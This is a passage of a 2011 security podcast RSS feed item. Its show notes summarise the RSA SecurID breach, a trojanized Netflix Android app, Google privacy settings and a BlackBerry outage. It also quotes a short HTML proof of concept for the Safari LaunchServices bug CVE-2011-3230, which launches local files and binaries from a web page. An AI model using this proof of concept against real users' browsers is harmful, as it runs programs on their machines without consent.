	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://nakedsecurity.sophos.com/2011/10/11/rsa-blames-nation-state-attack/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2011/10/11/rsa-blames-nation-state-attack/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RSA has revealed that it believes two groups, working on behalf of a single nation state, hacked into its servers and stole information related to the company&#39;s SecurID two-factor authentication products.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Speaking at the RSA Security Conference in London, RSA&#39;s executive chairman Art Coviello described the high profile attack that made headlines around the world.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There were two individual groups from one nation state, one supporting the other. One was very visible and one less so.. We&#39;ve not attributed it to a particular nation state although we&#39;re very confident that with the skill, sophistication and resources involved it could only have been a nation state.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inevitably, people are likely to assume that China might have been involved in the attack &#8211; but there&#39;s nothing in RSA&#39;s statements to either implicate China or to back-up the claims that any country was involved.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems very odd to me for a company to say that they have determined that a country had attacked them, but to not then name the country.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You will probably remember that RSA didn&#39;t do itself many favours when it first admitted the breach in April, playing its cards rather close to its chest then, and not saying much more about the ongoing security of its tokens than:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;we are confident that the information extracted does not enable a successful direct attack on any of our RSA SecurID customers.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unfortunately, the truth was that RSA&#39;s server breach </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">did</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> subsequently lead to another attack against a leading US military contractor, and the security firm&#39;s hand was forced into offering to replace some customers&#39; SecurID devices.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The malware attack</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">RSA was struck by a targeted malware attack, emailed to a small number of their employees.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attached to the email was a file, &quot;2011 Recruitment plan.xls&quot;. The poorly worded email was designed to trick users into opening the attachment. And &#8211; unfortunately &#8211; at least one of them fell for the trap.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Excel spreadsheet had been boobytrapped, and contained a malicious Flash payload inside it. Opening the file exploited an Adobe zero-day vulnerability that then downloaded a remote access Trojan horse called Poison Ivy onto the computer.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the Trojan horse was in place, the hackers could begin to steal information and inveigle their way into RSA&#39;s network infrastructure.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">APT or not?</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At the time of the initial disclosure, RSA&#39;s Coviello described the attack as an &quot;extremely sophisticated&quot; Advanced Persistent Threat (APT).</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some wags in the security industry have noted that corporate victims of malware attacks might like to use the &quot;APT&quot; buzzword to make a breach seem less embarrassing.</span><img height="214px;" src="https://lh3.googleusercontent.com/pWGV27HNwli9y7exco0XlLo489P-rYTqGBPVHSFAWpthQhrg51kM_HDX70-VnfD2I5SFVb4n3rpR3Snjnp8Dgn1sfHYsUAm-VUzv2yONa9wTok6KVBI" width="498px;" /><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Whether that&#39;s fair or not is open to debate. But it certainly puts a better spin on things if you claim that highly-skilled hackers with the resources of an unnamed country attacked your computer network rather than your common-or-garden cybercriminal.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="https://www.net-security.org/malware_news.php?id=1873"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.net-security.org/malware_news.php?id=1873</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When Netflix released an Android client app earlier this year, it also witnessed the attempts of various app developers who tried to make a pirated copy of it work on other devices and platforms.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As unwelcome as this development was, the situation has been made even worse as cyber criminals have also taken advantage of this gap between supply and demand and have pushed out a Trojanized version of the app bent on stealing the users&#39; account login credentials.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Despite the fact that there are multiple permissions being requested at the time of installation &ndash; identical to the permissions required by the actual app &ndash; our analysis shows that this is, in fact, a red herring, probably used to add to the illusion that the end user is dealing with the genuine article,&quot; point out Symantec researchers.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the victim enters his account credentials, the information is automatically sent to a remote server which is, luckily, currently offline. Also, the Trojanized app doesn&#39;t react any differently when the incorrect email/password combination is entered.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After the &quot;Sign In&quot; button is pressed, the user is faced with a screen saying that the app is incompatible with his device and urges him to download a different app, but doesn&#39;t link to it or attempt to download it automatically.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A click on the &quot;Cancel&quot; button below that explanation triggers the uninstall process. &quot;Any attempt to prevent the uninstall process results in the user being returned to the previous screen with the incompatibility message,&quot; say the researchers.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://1dave1cup.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://1dave1cup.com/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please ignore how nasty that url sounds, it&rsquo;s actually legitimate. &nbsp;Since early in the year, our own Dave Kennedy has been teaching some preparation classes for the Offensive Security Ohio Chapter. &nbsp;If you dare follow that link, you will find audio and video recordings of these classes that will attempt to bring you up to speed for obtaining some of the Offensive Security certifications such as the OSCP. &nbsp;If you happen to be near North Canton, Ohio you can actually attend these classes live but I have to warn you that you will probably be extremely lost without going through(and fully comprehending) all of the audio and video to date. &nbsp;The OSCP/OSCE/OSWP are heavy duty certs that even some of the biggest names in the industry have walked away from crying. &nbsp;If you intend to attempt these certs, it&rsquo;s well worth your time to watch/listen to this series to help minimize the pain.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.google.com/intl/en/privacy/tools.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.google.com/intl/en/privacy/tools.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Someone from Google pointed my attention to this page the other day. &nbsp;It&rsquo;s the Google privacy center. &nbsp;They have consolidated links to all of their privacy tools in one place. &nbsp;In here you&rsquo;ll find links to things such as Street View blurring, the Data Liberation Front, information on Encrypted Search and much more. &nbsp;The one particular item that my anonymous friend from Google pointed out was something called &ldquo;Search Personalization Opt Out&rdquo;. &nbsp;Clicking this link leads to a page referring to turning off search history personalization.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apparently he heard me ranting about this the other day on ISD and wanted to steer me in the right direction. &nbsp;This is what the page says:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Turning off search history personalization:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google sometimes customizes your search results based on your past search activity on Google. This customization includes searches you&#39;ve done and results you&#39;ve clicked. Since personalized search treats signed-in and signed-out users differently, the instructions for turning off search history personalization are a little different in each case.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Signed in searches</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To disable history-based search customizations while signed in, you&#39;ll need to</span><a href="http://www.google.com/support/accounts/bin/answer.py?answer=54067"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">remove Web History</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> from your Google Account. You can also choose to remove individual items. Note that removing this service deletes all your old searches from Web History.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Signed out searches</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you aren&#39;t signed in to a Google Account, your search experience will be customized based on past search information linked to a</span><a href="http://www.google.com/privacy_faq.html#toc-terms-cookie"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">cookie</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on your browser. To disable these types of customizations, follow these steps:</span></p>
<ol>
<li style="list-style-type:decimal;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the top right corner of the search results page, click the </span><img height="14px;" src="https://lh4.googleusercontent.com/EnhgtNJBDY7eHkhRQXX6LOqx2_CwD__sN9nMcO9JFMzR-sNdaw8ZSiVdBNpfVtBTzCchCukN4Yb3lWxDjKAfkglmAgI_v-ZU5l1UFXlM9QvJ7vydKmg" width="18px;" /><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Web History</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></li>
<li style="list-style-type:decimal;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On the resulting page, click </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Disable customizations based on search activity</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.(Because this preference is stored in a cookie, it&#39;ll affect anyone else who uses the same browser and computer as you).</span></li>
<li style="list-style-type:decimal;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</li>
</ol>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Or, if you&#39;d rather just delete the current cookie storing searches from your browser and start fresh,</span><a href="http://www.google.com/support/websearch/bin/answer.py?answer=497"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">clear your browser&#39;s cookies</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Note:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> If you&#39;ve disabled search customizations, you&#39;ll need to disable it again after clearing your browser cookies; clearing your Google cookie turns on history-based customizations.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sounds fine and dandy until you stop and analyze it a bit more. &nbsp;Looking at the &ldquo;signed in&rdquo; searches section, you&rsquo;ll notice that they have you removing your web history from the account. &nbsp;But now say that you are still surfing while signed in, what&rsquo;s to stop it from building back up again? &nbsp;What I would like to see from Google is an actual checkbox that says &ldquo;Don&rsquo;t collect web history&rdquo;. &nbsp;It seems like they continue to dance around that issue.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&#39;s not a ton to say about this bug aside from &quot;Yikes&quot;! &nbsp;I think the PoC speaks for itself. &nbsp;This allows you to send any &quot;file:&quot; url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. &nbsp;The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. &nbsp;Other than that, you can run or launch anything you can access by using the method in the html provided below.</span><br />
	&nbsp;</p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="556" /></colgroup>
<tbody>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
					<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&lt;html&gt;<br class="kix-line-break" /><br />
					&lt;head&gt;<br class="kix-line-break" /><br />
					&lt;base href=&quot;file://&quot;&gt;<br class="kix-line-break" /><br />
					&lt;script&gt;<br class="kix-line-break" /><br />
					function DoIt() {<br class="kix-line-break" /><br />
					&nbsp;alert(document.getElementById(&quot;cmdToRun&quot;).value);<br class="kix-line-break" /><br />
					&nbsp;document.location=document.getElementById(&quot;cmdToRun&quot;).value;<br class="kix-line-break" /><br />
					}<br class="kix-line-break" /><br />
					&lt;/script&gt;<br class="kix-line-break" /><br />
					&lt;/head&gt;<br class="kix-line-break" /><br />
					&lt;body&gt;<br class="kix-line-break" /><br />
					&lt;select id=&quot;cmdToRun&quot;&gt;<br class="kix-line-break" /><br />
					&lt;option value=&quot;/usr/sbin/netstat&quot;&gt;Launch /usr/bin/netstat&lt;/option&gt;<br class="kix-line-break" /><br />
					&lt;option value=&quot;/etc/passwd&quot;&gt;Launch /etc/passwd&lt;/option&gt;<br class="kix-line-break" /><br />
					&lt;option value=&quot;/Applications/Utilities/Bluetooth File Exchange.app&quot;&gt;<br class="kix-line-break" /><br />
					Launch Bluetooth File Exchange.app&lt;/option&gt;<br class="kix-line-break" /><br />
					&lt;/select&gt;<br class="kix-line-break" /><br />
					&lt;br /&gt;<br class="kix-line-break" /><br />
					&lt;input type=button value=&quot;Launch&quot; onclick=&quot;DoIt()&quot;&gt;<br class="kix-line-break" /><br />
					&lt;br /&gt;<br class="kix-line-break" /><br />
					&lt;/body&gt;<br class="kix-line-break" /><br />
					&lt;/html&gt;<br class="kix-line-break" /><br />
					</span></td>
</tr>
</tbody>
</table>
</div>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple&#39;s advisory:</span><a href="http://support.apple.com/kb/HT5000"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://support.apple.com/kb/HT5000</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://threatpost.com/en_us/blogs/rim-exec-says-blackberry-service-wasnt-hackedreally-101311"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/rim-exec-says-blackberry-service-wasnt-hackedreally-101311</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Research in Motion CTO David Yach said that the rolling service outages that its Blackberry mobile phone system has experienced in the last few days wasn&#39;t due to a security compromise, but to an unsuccessful fail over following a core switch failure in Europe.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I know there&#39;s often speculation in these types of situations of a potential breach or hack as the cause&quot; Yach offered on Thursday. But he assured those listening that the Blackberry service didn&#39;t appear to have been hacked. &quot;We&#39;ve seen no evidence that this is the case,&quot; he said.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Instead, the company is dealing with a backlog of untold numbers of unsent messages.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;A large backlog of messages has been generated. We&#39;ve had to throttle traffic to stabilize service while we process the substantial backlog of messages in a controlled manner. That&#39;s why we&#39;re seeing ongoing issues and impacts to other regions of the world,&quot; Yach said on the call,</span><a href="http://www.bbc.co.uk/news/technology-15288247"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> an excerpt of which was posted by the BBC.</span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-495-the-blame-game-netflix-fakester-dave%e2%80%99s-moonlighting-private-googlez-safari-rim/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/2969/0/infosec-daily-podcast-episode-495.mp3" length="19940669" type="audio/mpeg" />
		<itunes:duration>0:41:32</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 495 for Friday, October 14, 2011. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. b0n3z.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charl[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 495 for Friday, October 14, 2011. &#160;Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. b0n3z.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charleston House Hotel and Conference Center
	http://www.hack3rcon.org/
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia
	http://nordsec2011.cyber.ee/
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info

	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://nakedsecurity.sophos.com/2011/10/11/rsa-blames-nation-state-attack/
	RSA has revealed that it believes two groups, working on behalf of a single nation state, hacked into its servers and stole information related to the company&#39;s SecurID two-factor authentication products.
	Speaking at the RSA Security Conference in London, RSA&#39;s executive chairman Art Coviello described the high profile attack that made headlines around the world.
	&#34;There were two individual groups from one nation state, one supporting the other. One was very visible and one less so.. We&#39;ve not attributed it to a particular nation state although we&#39;re very confident that with the skill, sophistication and resources involved it could only have been a nation state.&#34;
	Inevitably, people are likely to assume that China might have been involved in the attack &#8211; but there&#39;s nothing in RSA&#39;s statements to either implicate China or to back-up the claims that any country was involved.
	It seems very odd to me for a company to say that they have determined that a country had attacked them, but to not then name the country.
	You will probably remember that RSA didn&#39;t do itself many favours when it first admitted the breach in April, playing its cards rather close to its chest then, and not saying much more about the ongoing security of its tokens than:
	&#34;we are confident that the information extracted does not enable a successful direct attack on any of our RSA SecurID customers.&#34;
	Unfortunately, the truth was that RSA&#39;s server breach did subsequently lead to another attack against a leading US military contractor, and the security firm&#39;s hand was forced into offering to replace some customers&#39; SecurID devices.
	The malware attack
	RSA was struck by a targeted malware attack, emailed to a small number of their employees.
	Attached to the email was a file, &#34;2011 Recruitment plan.xls&#34;. The poorly worded email was designed to trick users into opening the attachment. And &#8211; unfortunately &#8211; at least one of them fell for the trap.
	The Excel spreadsheet had been boobytrapped, and contained a malicious Flash payload inside it. Opening the file exploited an Adobe [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 494 &#8211; Down the Wh1t3Rabbit Hole (Special Guest: Rafal Los)</title>
		<link>http://www.isdpodcast.com/episode-494-down-the-wh1t3rabbit-hole-special-guest-rafal-los</link>
		<comments>http://www.isdpodcast.com/episode-494-down-the-wh1t3rabbit-hole-special-guest-rafal-los#comments</comments>
		<pubDate>Fri, 14 Oct 2011 01:11:15 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

